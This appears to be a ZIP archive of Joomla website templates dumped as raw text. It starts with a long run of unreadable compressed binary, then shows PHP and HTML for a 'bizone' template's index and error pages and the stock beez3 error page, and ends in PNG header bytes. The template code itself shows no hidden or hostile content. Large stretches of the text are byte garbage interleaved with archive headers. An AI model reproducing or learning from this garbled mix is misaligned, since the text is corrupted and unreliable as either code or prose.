�@��P�^&I{�b�,���=�o�9��Yr$*oe�ؑ�~C��������v0
����H�2nc�&^��7/�L)�NPAk�=il�C���t�����"���8<r|�t�<��q/I<N���Z�{��dJ��{b7�0��tY��5��")�O4g��G._�d��х�ߣB�R��� DТ�E��|��w�c"�u�̕Hz2���pQ��zr�����s�f-3�T骊�`�<�δ���㓰�(�@䱝��E��8e�
�dc�:aKT}�|���B�H�<0f�.�s�~z5�ထ�m�N��.�|��)��
�Q�>&�7/!$�������FYf��{H�2�tT��k��2�R�4[�4�%��x�0���q~�I�+z�Y��Sab�4���e	�a8p!���[�€�]3�Ƞ��jt�T�u��R��d�V�v�=\���5��K����Wΰ��C�-U�Ҿe�<[m#{���&�䪧����6(�"J4W�0}�lY����Z�Sh��ݳI]ڎWZS�чC�74xF�U�z�q��5��$NU�TZ��D�A�D��BM�閍U@s&��1[7P�C�H<x�kM��
�i|���85G�hF��W\那�=�� ߀�Q��9���P��ל8�u'r�4e��qjwˊ�bD�%�$�k�9��lݯ1t�0xj�4N��r��]V�(��
q�-�e��%qV�*i�@�Ơ�׺?�F�1H����ţ��E�]�Zb��Y�}դ,0��y�3��|���L	N�XW�>�EKHFJ޷"�^�DB�3��p�V��|��pj������H����A��`~�cr��i�p&���6�9��]����'������?�H|)��*s�jb�P�O֑�9F	;<�/w|s��[�v�3�=U�!�֗�f8[߿)���]u�ִʼnz�	G�����Z�&�;Z�,�����Ұlyy!��W�4,.�j��6�[�dgc�_�{�a�X{�>8w��f]k�0@ؗ���g˴@D}"rv���wqTSHi�e�`+��c;i�7�qg(��"�u1\*�	�A>���]��إ�Uڂb��R�Rk��JՋ��]
���-vTQ.>W��PP�E
hT�[��rF3��k2��W�lƹEC 2���T�&�`�~7V�
,�
Ki
)˵Żs����°�KD8;oaN���1_�@�JW_��pVԝkH�H���P,�>�q4&"1��\�-f�tq�4ì����yq�1hk�����[��j܃ZN\��!
b}�����3���3�-O��OYB����f�Z��6��߲�B�
��cۅ&c����0�ό��+���`���p�_1n���6�Q�EZ�p�9�Ŵ&�^%Y�Yl!g���|���bIܱ��$�;��'R	yA�L&�/{����֮��`�&(�=׸�V�����xu8n0�~�EҦo�7"]U�6O�"��vk�$%����%-���~{}�`�+�M��l�3ڟa�%��!b�`q<�-�/�/BhIဝ��K�&6��l��$��זZ\� P�:�?fW���r1���ާ����Mh��2���P@[��Ԧ0�8�_���P�	��D@j�l���'o��5L�D�"Aj5���3~�"ښ*�������+�R�]�M��@e���DlK@��!b��8q`t�y!:Ir�@��*z�S:
���(U6B��Z�s����M���魼t�*�s�
�kc��K�Q�t\�%9��q��S��b��w�F��f����3K8���}Eٍ`����.�OP�J����KPWh���z0]�D�j��0����XAdwѫ��wf��9�!�I��Ȳ6�'�V��Vp���pI7U�?J��H���-�-�ßw2��g�,a�5L��`��e���p�V�����Br���[�%�zUu����
��.n(=&[��X?}߯�$�8�ѻ�B��2L�I�6�{�G)�� l��u��эú��L��c���/H0A�'����ɹ��
L��|�DH���-8�:���d�������(��|f���k��#��BJ!��[;��>{��k�]~��C����y�+z�>c����'kT�֔��`d@0��`Y0�vJ�:7^'����؉G�,05�?���иJ��Xz��%��:����|��'O�[*��t>f��X$��
��������~����Y���P�(�pgN3_�.P�!�`���<x�H@�5W�ګi��E	j�m��5T�#�p���B�:'��PD#DMPe_����<smO�p��D��������1�C4�er�� p�R>T"���Hhɼ�쏒D"�)5 Gi湁����/IX>��y8p��Aփ�GGp郆��6f(��#AJ3iH�Q�#,F#��0+��݊�.������*�T�Ao���)LP���@"��!
*8U��qa♅{
��)@T��hB�E'
y^$�B@��G��b%tI(��a=�f�D����&�HH�A="AD*�K ��懿M�:��h?��a����[
z�6
z���	��M	�	T
~
o��l��`��2т� ��
��HUh�r�pt ���(�I��A�� �
�$�4x
`	�q�p@N�Gp	�����.d�P�G�u�_��b�������o�>��O���������?|����_�c��ۿZ����*�w�?ɟ7�]�g�Vx_��3�zYꯣ>������>}b���/k=�C�޾�aҮ��ü�&v��W�K��ɯ�f9��S���&��y�qh�o�k��5�6x&��]���[<'��mտKt&�-�� ��;�&�v��
�m�l����m�~Ǜo�`���k���#�UB���9�E�gP^e�{u��[n�y�n+L�f:����+��a..��G��!\��e󌋍ƍ�@w�Q�vY�"u�T�Q+�dPv�@�!�c�&w`�f��uO(F�jh0
�9�a�U&�Yb$��je}Ac���L�W�t�; ���]���g2�I�<ㅀ�?�#�����f���Q��+��H<^2��l:.����Ba�c��ӈ�B,�Q�^�G�靲`�aϱ�ƣ9ˊ�Q�cP�v���e��K?�pN%00,2ȟ��}M��}��K������B�
��)MG���ti�g�P��va��b/	�*Z �H5�R��E0�u�����G[89��p/f]�҅-��:
d)�#���l�'~����'�U(6-(j�0`�TtӤ��p���ƣ�Ǘ�^X�*
��8�r��bk����L!��n3����χ���~F��3�0���Ne�/��~D�)x5P�@o�3�0|�G���y�mB���¡(�@k�~���.�a��F�n����P��!���
_�{�+������f��@'}�}��b��
2Õt�dF�DK�g8m6��E��鎕�yWZ�"	E�a�L�k�(z�Cq���0�v�u�&O�P��Ŗ!�u�ƶ��K5�ƐMٳ��&�F�{�I����=X;�+ʂ_�3�M:#��㑎�\��=���ߘ4��h"_�?H���V��Ú7�x�x�i"����(m�Ţs�N Jz��7�W$�[���~-yH��Nq�@�"���u����S�t����av�½���Mi�Yb,z��1h���b��-�"��I~%��x�K���6��%�F��=�~�dP�MKC�|���^H�Dj�����M�>�X���i�h��H]�r�%f�-��%lY�VW|��v�E�by�[��I�[_�T�x�V��XM�L����T�au<�������0���K�!'[��¬-���I(u먶t��-E"��iM���K{��BN�x�-�"�s�����)gzP�5�Ea����9��)*�O��Zxp�;LvH���cx�k��.T��
�>�ZR1���ǐ)��
���tM���,�7z�W4���RS��C����eT�`��6SŲlFd�N�2,�o��b�'�z\�&��*
D騊�M��Ce���|�=<9r��(R������U������V:J֗��8��J���$f�З�V8�һ��$�w�ث�u@�[Jx��ы�J~�Q9;��a`��`)wF3�I4元���_ q���1Q2?뛉9'�b�|�:P6�A���@Y��8���i���ǚ�x���Q�Z�g��aMW4x(��]�W'�����鉐11�P�����C��F(���[��*��.E�A^S�+��	_x:b�`��T@ـ`�$SE:".'W����#�+�I�;���<����6d-�O����3�Bs��eٸ\���%8t<�.�?��^p�z4�N�hd�lxr���\nF�=�/�^F��h�ݺy~66�įMtܝ8Ŵ��s���`�l��H�&�j�ׂ����g���ŘQ	��4�#�ɫ�ۈ�9�aEl���Gh��B�3�*�
N|�4�	r�oHY�࿂BJ��jJŭ���GW����*Q�CU����y��$&���m�Z`-�	P�i9�m���+Wð$�(��@�X�� ǒ~��$#��yM�EH��vM��p�'�a8	O�'gk��\�J��[4�faI��\�Dž��'T��`0;K`?PQ�U�$����Y�,�:aC�ˍi6�c	�2��E�v٩�gp�b"ΞX�-2�]B�՝�AT�Yi�^U`	^�)����Bb��zm|	&	
)jJl���OQq��$SΡe=E������=�Q#>
�b��aJ�w�]��v8����g{`�QO�Q��BK
/�I�[��+&̓"R|x»�
_�S��}x��آ|RD�|f1��
�1��{�?S@��0A�?Tӕ�r�x�D����gNo|�錼�8N�n����F�	�����A���
8����V
c�#���t��}��N%-��_��	"гh�ϼ�ݿ�_���dG��<3|�{�������y���0.<�����`�i^���@JtR{��,����ݯ�|lס��WH��ah���c�Y��{���r՜V�#!�Ia�����qZ7ו�U0����0D���l��B�ݢ�Ȭ�[��l٬[E`�V*��_r����U��8!^Q��P�XV��XR|*���e��%fZJ�xPr�,|�-��|p@�^�y>4,�����ʅ�M�T��A�G���
=�鱃�0r��P���j� �`:D'��'\!4��߅'���g�|���櫪X���@.ʋ���Z�~�q��Abӑ'T�0��'=�Cy��!���u��Dݸ|�s�2�ف|5~U�m�L��Q�%	��j4ǁt5 �(�[L��=ަZis���T��G��/`#��Zhr��r�>$�'�[@��pq-3�cV�E�ĝ�d��g��w���e7p���԰p�[<�p[�;�N��
$��{�r9�M��I�xQ"�v�)7�
�i&�[/�0hڗYo�Y�R����h`@�
o-�BR2�g@���+��"j��c��SId�YK�?p,�#����k�h)�J)BY���IfG�C�� LPK!" ��l5l5bizone/index.phpnu&1i�<?php
/**
 * @package     Joomla.Site
 * @subpackage  Templates.protostar
 *
 * @copyright   Copyright (C) 2005 - 2014 Open Source Matters, Inc. All rights reserved.
 * @license     GNU General Public License version 2 or later; see LICENSE.txt
 */

defined('_JEXEC') or die;

$app             = JFactory::getApplication();
$doc             = JFactory::getDocument();
$user            = JFactory::getUser();
$this->language  = $doc->language;
$this->direction = $doc->direction;

// Getting params from template
$params = $app->getTemplate(true)->params;

// Detecting Active Variables
$option   = $app->input->getCmd('option', '');
$view     = $app->input->getCmd('view', '');
$layout   = $app->input->getCmd('layout', '');
$task     = $app->input->getCmd('task', '');
$itemid   = $app->input->getCmd('Itemid', '');
$sitename = $app->get('sitename');
$menu = $app->getMenu();
$active = $menu->getItem($itemid);

/* Get params */
$bt_layout = $bt_logo = $pageclass = $page_heading = '';
$bt_logo_1= '';
if(isset($active->id)){
	$params_menu = $menu->getParams( $active->id );
	$pageclass = $params_menu->get( 'pageclass_sfx' );
	$page_heading = $params_menu->get( 'page_heading' );

	if( $params_menu->get('bt_logo') ){
		$bt_logo = $params_menu->get('bt_logo');
	} else {
		$bt_logo = $this->params->get('logoFile');
	}

	if( $params_menu->get('bt_logo_1') ){
		$bt_logo_1 = $params_menu->get('bt_logo_1');
	} elseif( $this->params->get('logoFile_2') ) {
		$bt_logo_1 = $this->params->get('logoFile_2');
	} else {
		$bt_logo_1 = 'templates/' . $this->template . '/images/logo.png';
	}

	if( $params_menu->get('bt_layout') ){
		$bt_layout = $params_menu->get('bt_layout');
	} else {
		$bt_layout = $this->params->get('bt_layout');
	}

	if( $params_menu->get('bt_bgheader') ){
		$bgHeader = JUri::root() .$params_menu->get('bt_bgheader');
	} else {
		$bgHeader = JUri::root() .$this->params->get('bt_bgheader');
	}
} else {
	$bt_logo = $this->params->get('logoFile');
	$bt_layout = $this->params->get('bt_layout');
	$bt_logo_1 = $this->params->get('logoFile_2');
	$bgHeader = JUri::root() .$this->params->get('bt_bgheader');
}
if ($this->params->get('btloading') == '1'){
	$bt_loading = true;
}
else
	$bt_loading = false;
if($this->params->get('btdirection'))
	$this->direction = 'rtl';
else
	$this->direction = 'ltr';

if($task == "edit" || $layout == "form" )
{
	$fullWidth = 1;
}
else
{
	$fullWidth = 0;
}

// Add JavaScript Frameworks
//JHtml::_('bootstrap.framework');
$doc->addScript(JUri::root() .'templates/' . $this->template . '/js/bootstrap.min.js'); 
$doc->addScript(JUri::root() .'templates/' . $this->template . '/js/jquery.easing.min.js'); 
$doc->addScript(JUri::root() .'templates/' . $this->template . '/js/jquery.parallax-1.1.3.js');
$doc->addScript(JUri::root() .'templates/' . $this->template . '/js/jquery-countTo.js'); 
$doc->addScript(JUri::root() .'templates/' . $this->template . '/js/jquery.appear.js'); 
$doc->addScript(JUri::root() .'templates/' . $this->template . '/js/jquery.mixitup.min.js'); 
$doc->addScript(JUri::root() .'templates/' . $this->template . '/js/wow.min.js');
$doc->addScript(JUri::root() .'templates/' . $this->template . '/js/jquery.circliful.js');
$doc->addScript(JUri::root() .'templates/' . $this->template . '/js/owl.carousel.min.js'); 
$doc->addScript(JUri::root() .'templates/' . $this->template . '/js/jquery.fancybox.js');
$doc->addScript(JUri::root() .'templates/' . $this->template . '/js/jquery.fancybox-media.js');
$doc->addScript(JUri::root() .'templates/' . $this->template . '/js/jqSocialSharer.min.js');
$doc->addScript(JUri::root() .'templates/' . $this->template . '/js/jPushMenu.js');
$doc->addScript(JUri::root() .'templates/' . $this->template . '/js/functions.js');

// Add Stylesheets
$doc->addStyleSheet(JUri::root() .'templates/' . $this->template . '/css/bootstrap.min.css');
$doc->addStyleSheet(JUri::root() .'templates/' . $this->template . '/css/animate.min.css');
$doc->addStyleSheet(JUri::root() .'templates/' . $this->template . '/css/font-awesome.min.css');
$doc->addStyleSheet(JUri::root() .'templates/' . $this->template . '/css/icomoon-fonts.css');
$doc->addStyleSheet(JUri::root() .'templates/' . $this->template . '/css/jquery.fancybox.css');
$doc->addStyleSheet(JUri::root() .'templates/' . $this->template . '/css/jquery.fancybox-thumbs.css');
$doc->addStyleSheet(JUri::root() .'templates/' . $this->template . '/css/settings.css');
$doc->addStyleSheet(JUri::root() .'templates/' . $this->template . '/css/owl.carousel.css');
$doc->addStyleSheet(JUri::root() .'templates/' . $this->template . '/css/owl.transitions.css');
$doc->addStyleSheet(JUri::root() .'templates/' . $this->template . '/css/loader.css');
$doc->addStyleSheet(JUri::root() .'templates/' . $this->template . '/css/zerogrid.css');
// $doc->addStyleSheet(JUri::root() .'templates/' . $this->template . '/css/loader-colorful.css');
$doc->addStyleSheet(JUri::root() .'templates/' . $this->template . '/css/onepage.css');
$doc->addStyleSheet(JUri::root() .'templates/' . $this->template . '/css/one-color.css');

if( $this->params->get('maincolor') ){
	$maincolor = $this->params->get('maincolor');
	$maincolor = substr( $maincolor, 1 );
	$doc->addStyleSheet(JUri::root() .'templates/' . $this->template . '/css/color.php?main_color=' .$maincolor);
}
// Adjusting content width
if( isset($bt_logo) && $bt_logo != '' ){
	$logo = '<img class="img-responsive" data-default="' . JUri::root() . $bt_logo . '" data-sticky="' . JUri::root() . $bt_logo_1 . '" src="' . JUri::root() . $bt_logo . '" alt="' . $sitename . '" />';
} elseif ($this->params->get('logoFile')){
	$logo = '<img class="img-responsive" data-default="' . JUri::root() . $this->params->get('logoFile') . '" data-sticky="' . JUri::root() . $bt_logo_1 . '" src="' . JUri::root() . $this->params->get('logoFile') . '" alt="' . $sitename . '" />';
} else {
	$logo = '<img class="img-responsive" data-default="' . JUri::root() .'templates/' . $this->template . '/images/logo.png" data-sticky="' . JUri::root() . $bt_logo_1 . '"  src="' . JUri::root() .'templates/' . $this->template . '/images/logo.png" alt="' . $sitename . '" />';
}


?>
<!DOCTYPE html>
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="<?php echo $this->language; ?>" lang="<?php echo $this->language; ?>" dir="<?php echo $this->direction; ?>">
<head>
	<jdoc:include type="head" />
	<meta http-equiv="X-UA-Compatible" content="IE=edge">
	<meta name="viewport" content="width=device-width, initial-scale=1">
	
	<?php if ($this->params->get('favicon')): ?>
		<link rel="shortcut icon" href="<?php echo $this->params->get('favicon'); ?>" type="image/x-icon">
	<?php endif; ?>
	<?php if ($this->params->get('apple-touch')): ?>
		<link rel="apple-touch-icon" href="<?php echo $this->params->get('apple-touch'); ?>" />
	<?php endif; ?>
	<?php if ($this->params->get('apple-touch-57')): ?>
		<link rel="apple-touch-icon" sizes="57x57" href="<?php echo $this->params->get('apple-touch-57'); ?>">
	<?php endif; ?>
	<?php if ($this->params->get('apple-touch-72')): ?>
		<link rel="apple-touch-icon" sizes="72x72" href="<?php echo $this->params->get('apple-touch-72'); ?>">
	<?php endif; ?>
	<?php if ($this->params->get('apple-touch-114')): ?>
		<link rel="apple-touch-icon" sizes="114x114" href="<?php echo $this->params->get('apple-touch-114'); ?>">
	<?php endif; ?>
	<?php if ($this->params->get('apple-touch-144')): ?>
		<link rel="apple-touch-icon" sizes="144x144" href="<?php echo $this->params->get('apple-touch-144'); ?>">
	<?php endif; ?>

	<link href='https://fonts.googleapis.com/css?family=Raleway:100,200,300,400%7COpen+Sans:400,300' rel='stylesheet' type='text/css'>
	
	<?php if ($this->params->get('googleFont')) : ?>
		<link href='//fonts.googleapis.com/css?family=<?php echo $this->params->get('googleFontName'); ?>' rel='stylesheet' type='text/css' />
		<style type="text/css">
			body,h1,h2,h3,h4,h5,h6,.site-title{
				font-family: '<?php echo str_replace('+', ' ', $this->params->get('googleFontName')); ?>', sans-serif;
			}
		</style>
	<?php endif; ?>

	<?php if ($this->params->get('cssbefore') != '')
		echo '<style type="text/css">' .$this->params->get('cssbefore') .'</style>';
	?>
	<!--[if lt IE 9]>
		<script src="https://oss.maxcdn.com/libs/html5shiv/3.7.0/html5shiv.js"></script>
      	<script src="https://oss.maxcdn.com/libs/respond.js/1.4.2/respond.min.js"></script>
	<![endif]-->
</head>

<?php
	$body_class = $pageclass;
	$body_class .= ' ' .$bt_layout;
?>
<body id="page-top" class="fixed-header site <?php echo $option
	. ' view-' . $view
	. ($layout ? ' layout-' . $layout : ' no-layout')
	. ($task ? ' task-' . $task : ' no-task')
	. ($itemid ? ' itemid-' . $itemid : '')
	. ' ' .$body_class; ?>" data-spy="scroll" data-target="#fixed-collapse-navbar" data-offset="120">

	<?php if( $bt_loading): ?>
	<div class="loader">
		<div class="spinner">
		  <div class="dot1">&nbsp;</div>
		  <div class="dot2">&nbsp;</div>
		</div>
	</div>
	<?php endif ?>
	<?php if( $bt_layout == 'index14' ): ?>
	<?php
		$doc->addScript(JUri::root() .'templates/' . $this->template . '/js/jPushMenu.js'); 
		$doc->addStyleSheet(JUri::root() .'templates/' . $this->template . '/css/jPushMenu.css');
		$doc->addStyleSheet(JUri::root() .'templates/' . $this->template . '/css/white.css');
	?>
	<header id="main-navigation">
		<div class="container-fluid">
			<div class="row">
				<div class="col-md-12"> 
					<a href="<?php echo JURI::base(); ?>" class="navbar-brand logo-space">
						<?php echo $logo; ?>
					</a>
					<nav class="cbp-spmenu cbp-spmenu-vertical cbp-spmenu-right"> 
						<a class="push_nav_brand" href="<?php echo JURI::base(); ?>">
							<?php echo '<img class="img-responsive" data-default="' . JUri::root() . $bt_logo_1 . '" data-sticky="' . JUri::root() . $bt_logo_1 . '" src="' . JUri::root() . $bt_logo_1 . '" alt="' . $sitename . '" />'; ?>
						</a>
						<?php if ($this->countModules('bizone-navmenu')): ?>
							<jdoc:include type="modules" name="bizone-navmenu" style="none" />
						<?php endif; ?>
					</nav>
				</div>
			</div>
		</div>
	</header>
	<div class="container-fluid">
  		<div class="main-button right">
	    	<button class="toggle-menu menu-right push-body jPushMenuBtn"> <span></span> <span></span> <span></span> </button>
	  	</div>
	</div>
	<?php else: ?>
	<header id="main-navigation" class="<?php echo $bt_layout; ?>">
		<?php if($bt_layout == "index5"): ?>
		<div id="navigation" class="affix">
		<?php else: ?>
		<div id="navigation" data-spy="affix" data-offset-top="20">
		<?php endif; ?>
		    <div class="container">
		      	<div class="row">
		      		<div class="col-md-12">
		      			<?php if ($this->countModules('bizone-topmenu')): ?>
		      				<jdoc:include type="modules" name="bizone-topmenu" style="none" />
						<?php endif; ?>
			        	<nav class="navbar navbar-default nav-mega <?php echo ($this->countModules('bizone-navmenu') ? 'social' : 'no-social'); ?>">
			          		<div class="navbar-header">
			           			<button type="button" class="navbar-toggle collapsed" data-toggle="collapse" data-target="#fixed-collapse-navbar" aria-expanded="false"> 
			            			<span class="icon-bar top-bar"></span> <span class="icon-bar middle-bar"></span> <span class="icon-bar bottom-bar"></span> 
			           			 </button>
			           			<a class="navbar-brand bizone-logo" href="<?php echo JURI::base(); ?>"><?php echo $logo; ?></a> 
			        		 </div>
			            	<div id="fixed-collapse-navbar" class="navbar-collapse collapse navbar-right">
								<?php if ($this->countModules('bizone-navmenu')): ?>
							    	<jdoc:include type="modules" name="bizone-navmenu" style="none" />
								<?php endif; ?>
			            	</div>
			         	</nav>
		       		</div>
		       	</div>
		    </div>
		</div>
	</header>
	<?php endif; ?>

	<div class="container-wrapper">
		<?php if( $option == 'com_blue_pagebuilder' ): ?>			
			<jdoc:include type="message" />
			<jdoc:include type="component" />
		<?php else:	?>
			<?php
				$bgImg = "background-image: url('" .$bgHeader ."');"
			?>
			<section class="innerpage-banner" style="<?php echo $bgImg; ?>">
				<div class="container">
					<div class="row">
						<div class="col-md-12 text-right">
							<h2><?php echo $doc->getTitle(); ?></h2>
							<p class="tagline">
							<?php if (isset($page_heading) && $page_heading != ''): ?>
								<?php echo $page_heading; ?>
							<?php endif; ?>
							</p>
						</div>
					</div>
				</div>
			</section>
			<section id="area-main" class="padding">
				<div class="container">
					<div class="row">
						<div class="<?php echo ($this->countModules('bizone-right') ? 'col-md-8 col-sm-8' : 'col-md-12 col-sm-12'); ?>">
							<jdoc:include type="message" />
							<jdoc:include type="component" />
						</div>
						<?php if ($this->countModules('bizone-right')): ?>
						<div class="col-md-4 col-md-4">
							<jdoc:include type="modules" name="bizone-right" style="widget" />
						</div>
						<?php endif; ?>
					</div>
				</div>
			</section>
		<?php endif; ?>
	</div>

	<?php if ($this->countModules('bizone-footer')): ?>
	<footer class=" wow fadeInUp" data-wow-duration="500ms" data-wow-delay="300ms"> 
  		<div class="container">
  			<?php if ($this->countModules('bizone-footer')): ?>
			<div class="row">
      			<div class="col-md-12 col-sm-12">
					<jdoc:include type="modules" name="bizone-footer" style="none" />
      			</div>
      		</div>
			<?php endif; ?>
  		</div>
  	</footer>
	<?php endif; ?>
	<a href="#." class="go-top text-center"><i class="fa fa-angle-double-up"></i></a>
	
	<jdoc:include type="modules" name="debug" style="none" />
</body>
</html>
PK!��j��bizone/error.phpnu&1i�<?php 

$app = JFactory::getApplication();
$doc = JFactory::getDocument();

$params = $app->getTemplate(true)->params;
$page_404 = $params->get('xml_404_page',0);
$menu = $app->getMenu();
$item = $menu->getItem( $page_404 );
if ($this->error->getCode() == '404' || $this->error->getCode() == '500') {
	$app->redirect(JRoute::_($item->link.'&Itemid='.$page_404));
	exit;
}
?>PK!s��GF!F!beez3/error.phpnu&1i�<?php
/**
 * @package     Joomla.Site
 * @subpackage  Templates.beez3
 *
 * @copyright   Copyright (C) 2005 - 2020 Open Source Matters, Inc. All rights reserved.
 * @license     GNU General Public License version 2 or later; see LICENSE.txt
 */

defined('_JEXEC') or die;

/** @var JDocumentError $this */

$showRightColumn = 0;
$showleft        = 0;
$showbottom      = 0;

// Get params
$app         = JFactory::getApplication();
$params      = $app->getTemplate(true)->params;
$logo        = $params->get('logo');
$color       = $params->get('templatecolor');
$navposition = $params->get('navposition');
$format      = $app->input->getCmd('format', 'html');
?>
<!DOCTYPE html>
<html lang="<?php echo $this->language; ?>" dir="<?php echo $this->direction; ?>">
<head>
	<meta charset="utf-8" />
	<title><?php echo $this->error->getCode(); ?> - <?php echo htmlspecialchars($this->error->getMessage(), ENT_QUOTES, 'UTF-8'); ?></title>
	<link href="<?php echo $this->baseurl; ?>/templates/system/css/system.css" rel="stylesheet" />
	<link href="<?php echo $this->baseurl; ?>/templates/system/css/error.css" rel="stylesheet" />
	<link href="<?php echo $this->baseurl; ?>/templates/<?php echo $this->template; ?>/css/position.css" rel="stylesheet" media="screen" />
	<link href="<?php echo $this->baseurl; ?>/templates/<?php echo $this->template; ?>/css/layout.css" rel="stylesheet" media="screen" />
	<link href="<?php echo $this->baseurl; ?>/templates/<?php echo $this->template; ?>/css/print.css" rel="stylesheet" media="print" />
	<link href="<?php echo $this->baseurl; ?>/templates/<?php echo $this->template; ?>/css/<?php echo htmlspecialchars($color); ?>.css" rel="stylesheet" />
	<?php $files = JHtml::_('stylesheet', 'general.css', array('relative' => true, 'returnPath' => true)); ?>
	<?php if ($files) : ?>
		<?php if (!is_array($files)) : ?>
			<?php $files = array($files); ?>
		<?php endif; ?>
	<?php foreach ($files as $file) : ?>
		<link href="<?php echo $file; ?>" rel="stylesheet" />
	<?php endforeach; ?>
	<?php endif; ?>
	<link href="<?php echo $this->baseurl; ?>/templates/<?php echo $this->template; ?>/css/<?php echo htmlspecialchars($color, ENT_COMPAT, 'UTF-8'); ?>.css" rel="stylesheet" />
	<?php if ($this->direction === 'rtl') : ?>
		<link href="<?php echo $this->baseurl ?>/templates/<?php echo $this->template; ?>/css/template_rtl.css" rel="stylesheet" />
		<?php if (file_exists(JPATH_SITE . '/templates/' . $this->template . '/css/' . $color . '_rtl.css')) : ?>
			<link href="<?php echo $this->baseurl; ?>/templates/<?php echo $this->template; ?>/css/<?php echo htmlspecialchars($color, ENT_COMPAT, 'UTF-8'); ?>_rtl.css" rel="stylesheet" />
		<?php endif; ?>
	<?php endif; ?>
	<?php if ($app->get('debug_lang', '0') == '1' || $app->get('debug', '0') == '1') : ?>
		<link href="<?php echo JUri::root(true); ?>/media/cms/css/debug.css" rel="stylesheet" />
	<?php endif; ?>
	<!--[if lte IE 6]><link href="<?php echo $this->baseurl; ?>/templates/<?php echo $this->template; ?>/css/ieonly.css" rel="stylesheet" /><![endif]-->
	<!--[if IE 7]><link href="<?php echo $this->baseurl; ?>/templates/<?php echo $this->template; ?>/css/ie7only.css" rel="stylesheet" /><![endif]-->
	<!--[if lt IE 9]><script src="<?php echo JUri::root(true); ?>/media/jui/js/html5.js"></script><![endif]-->
	<style>
	<!--
		#errorboxbody
		{margin:30px}
		#errorboxbody h2
		{font-weight:normal;
		font-size:1.5em}
		#searchbox
		{background:#eee;
		padding:10px;
		margin-top:20px;
		border:solid 1px #ddd
		}
	-->
	</style>
</head>
	<body>
		<div id="all">
			<div id="back">
				<div id="header">
					<div class="logoheader">
						<h1 id="logo">
							<?php if ($logo) : ?>
								<img src="<?php echo $this->baseurl; ?>/<?php echo htmlspecialchars($logo); ?>"  alt="<?php echo htmlspecialchars($params->get('sitetitle')); ?>" />
							<?php else : ?>
								<?php echo htmlspecialchars($params->get('sitetitle')); ?>
							<?php endif; ?>
							<span class="header1">
								<?php echo htmlspecialchars($params->get('sitedescription')); ?>
							</span>
						</h1>
					</div><!-- end logoheader -->
					<ul class="skiplinks">
						<li>
							<a href="#wrapper2" class="u2">
								<?php echo JText::_('TPL_BEEZ3_SKIP_TO_ERROR_CONTENT'); ?>
							</a>
						</li>
						<li>
							<a href="#nav" class="u2">
								<?php echo JText::_('TPL_BEEZ3_ERROR_JUMP_TO_NAV'); ?>
							</a>
						</li>
					</ul>
					<div id="line">
					</div><!-- end line -->
				</div><!-- end header -->
				<div id="contentarea2" >
					<div class="left1" id="nav">
						<h2 class="unseen">
							<?php echo JText::_('TPL_BEEZ3_NAVIGATION'); ?>
						</h2>
						<?php $module = JModuleHelper::getModule('menu'); ?>
						<?php echo JModuleHelper::renderModule($module); ?>
					</div><!-- end navi -->
					<div id="wrapper2">
						<div id="errorboxbody">
							<h2>
								<?php echo JText::_('JERROR_LAYOUT_PAGE_NOT_FOUND'); ?>
							</h2>
							<h3><?php echo JText::_('JERROR_LAYOUT_ERROR_HAS_OCCURRED_WHILE_PROCESSING_YOUR_REQUEST'); ?></h3>
							<p><?php echo JText::_('JERROR_LAYOUT_NOT_ABLE_TO_VISIT'); ?></p>
							<ul>
								<li><?php echo JText::_('JERROR_LAYOUT_AN_OUT_OF_DATE_BOOKMARK_FAVOURITE'); ?></li>
								<li><?php echo JText::_('JERROR_LAYOUT_MIS_TYPED_ADDRESS'); ?></li>
								<li><?php echo JText::_('JERROR_LAYOUT_SEARCH_ENGINE_OUT_OF_DATE_LISTING'); ?></li>
								<li><?php echo JText::_('JERROR_LAYOUT_YOU_HAVE_NO_ACCESS_TO_THIS_PAGE'); ?></li>
							</ul>
							<?php if ($format === 'html' && JModuleHelper::getModule('mod_search')) : ?>
								<div id="searchbox">
									<h3 class="unseen">
										<?php echo JText::_('TPL_BEEZ3_SEARCH'); ?>
									</h3>
									<p>
										<?php echo JText::_('JERROR_LAYOUT_SEARCH'); ?>
									</p>
									<?php $module = JModuleHelper::getModule('mod_search'); ?>
									<?php echo JModuleHelper::renderModule($module); ?>
								</div><!-- end searchbox -->
							<?php endif; ?>
							<div><!-- start goto home page -->
								<p>
								<a href="<?php echo $this->baseurl; ?>/index.php" title="<?php echo JText::_('JERROR_LAYOUT_GO_TO_THE_HOME_PAGE'); ?>"><?php echo JText::_('JERROR_LAYOUT_HOME_PAGE'); ?></a>
								</p>
							</div><!-- end goto home page -->
							<h3>
								<?php echo JText::_('JERROR_LAYOUT_PLEASE_CONTACT_THE_SYSTEM_ADMINISTRATOR'); ?>
							</h3>
							<h2>
								#<?php echo $this->error->getCode(); ?>&nbsp;<?php echo htmlspecialchars($this->error->getMessage(), ENT_QUOTES, 'UTF-8'); ?>
							</h2>
							<?php if ($this->debug) : ?>
								<br/><?php echo htmlspecialchars($this->error->getFile(), ENT_QUOTES, 'UTF-8');?>:<?php echo $this->error->getLine(); ?>
							<?php endif; ?>
							<br />
						</div><!-- end errorboxbody -->
					</div><!-- end wrapper2 -->
				</div><!-- end contentarea2 -->
				<?php if ($this->debug) : ?>
					<div>
						<?php echo $this->renderBacktrace(); ?>
						<?php // Check if there are more Exceptions and render their data as well ?>
						<?php if ($this->error->getPrevious()) : ?>
							<?php $loop = true; ?>
							<?php // Reference $this->_error here and in the loop as setError() assigns errors to this property and we need this for the backtrace to work correctly ?>
							<?php // Make the first assignment to setError() outside the loop so the loop does not skip Exceptions ?>
							<?php $this->setError($this->_error->getPrevious()); ?>
							<?php while ($loop === true) : ?>
								<p><strong><?php echo JText::_('JERROR_LAYOUT_PREVIOUS_ERROR'); ?></strong></p>
								<p>
									<?php echo htmlspecialchars($this->_error->getMessage(), ENT_QUOTES, 'UTF-8'); ?>
									<br/><?php echo htmlspecialchars($this->_error->getFile(), ENT_QUOTES, 'UTF-8');?>:<?php echo $this->_error->getLine(); ?>
								</p>
								<?php echo $this->renderBacktrace(); ?>
								<?php $loop = $this->setError($this->_error->getPrevious()); ?>
							<?php endwhile; ?>
							<?php // Reset the main error object to the base error ?>
							<?php $this->setError($this->error); ?>
						<?php endif; ?>
					</div>
				<?php endif; ?>
			</div><!--end back -->
		</div><!--end all -->
		<div id="footer-outer">
			<div id="footer-sub">
				<div id="footer">
				<p>
					<?php echo JText::_('TPL_BEEZ3_POWERED_BY'); ?>
					<a href="https://www.joomla.org/">
						Joomla!&#174;
					</a>
				</p>
				</div><!-- end footer -->
			 </div><!-- end footer-sub -->
		</div><!-- end footer-outer-->
	</body>
</html>
PK!����(beez3/images/system/notice-alert_rtl.pngnu&1i��PNG


